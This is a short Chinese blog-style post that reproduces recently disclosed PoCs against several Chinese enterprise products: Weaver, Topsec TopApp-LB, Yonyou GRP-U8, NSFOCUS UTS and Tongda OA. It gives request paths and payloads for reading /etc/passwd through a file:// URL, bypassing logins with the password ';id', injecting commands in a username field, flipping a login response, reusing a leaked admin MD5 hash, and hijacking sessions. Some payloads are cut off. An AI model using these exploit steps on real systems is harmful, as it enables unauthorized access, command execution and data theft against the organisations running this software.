护网过去了两天,爆出了几个漏洞。既然poc已经出了就简单复现一下。
泛微云桥文件读取
访问/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,会得到一个ID值
将得到的id值代入访问:/file/fileNoLogin/a2bc1953afc94346a729d7b0ff7f8c5d
天融信TopApp-LB
任意登录
用户名随便填写,密码为;id,成功登录某系统
命令执行漏洞
登录处用户名输入执行命令的语句,密码随便填写
成功执行了命令
用友GRP-u8 注入
路径:/Proxy
POST数据:cVer=9.8.0&dp=
绿盟UTS综合威胁探针管理员任意登录
1、修改登录数据包 {“status”:false,”mag”:””} -> {“status”:true,”mag”:””}
2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)
再次登录,将得到的md5替换admin的密码,即可成功登录
通达OA前台任意用户登录
1.首先访问 /ispirit/login_code.php 获取 codeuid。
2.然后访问 /general/login_code_scan.php 提交 post 参数:
3.最后访问/ispirit/login_code_check.php?codeuid=xxx,就可以得到session
将得到的session替换
即可登录OA